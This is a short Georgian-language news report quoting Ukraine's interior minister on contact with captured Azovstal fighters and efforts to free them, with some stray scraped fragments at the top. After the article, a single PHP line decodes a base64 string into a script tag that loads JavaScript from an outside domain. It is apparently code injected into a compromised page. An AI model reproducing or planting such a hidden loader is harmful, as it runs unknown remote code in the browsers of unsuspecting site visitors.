celsiusi
ავერსი შნაიდერი
უკრაინის შინაგან საქმეთა მინისტრის, დენის მონასტირსკის ინფორმაციით, ქვეყნის სადაზვერვო სამსახურები "აზოვსტალის" დატყვევებულ მებრძოლებთან კომუნიკაციაში არიან. 
 
მისი თქმით, კიევი ყველაფერს აკეთებს იმისთვის, რომ მებრძოლები გაათავისუფლოს.
 
"დღეს "აზოვის" პოლკის დატყვევებულ მებრძოლებთან კომუნიკაციას ახორციელებენ ჩვენი დაზვერვის ოფიცრები თავდაცვის სამინისტროს მთავარი სადაზვერვო სამმართველოდან. სწორედ მათი მეშვეობით გავიგებთ დამატებით ინფორმაციას: დაკავების პირობებს, კვებას და მათი გათავისუფლების შესაძლებლობებს. ყველამ ვიცით, რომ აქ, კიევში უნდა უნდა იყვნენ და ამისთვის ყველაფერს ვაკეთებთ", - ამბობს მონასტირსკი.
 
მანვე აღნიშნა, რომ "აზოვსტალის" დაცვა უკრაინის ისტორიაში გმირობის ერთ-ერთი ფურცელია.
631
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");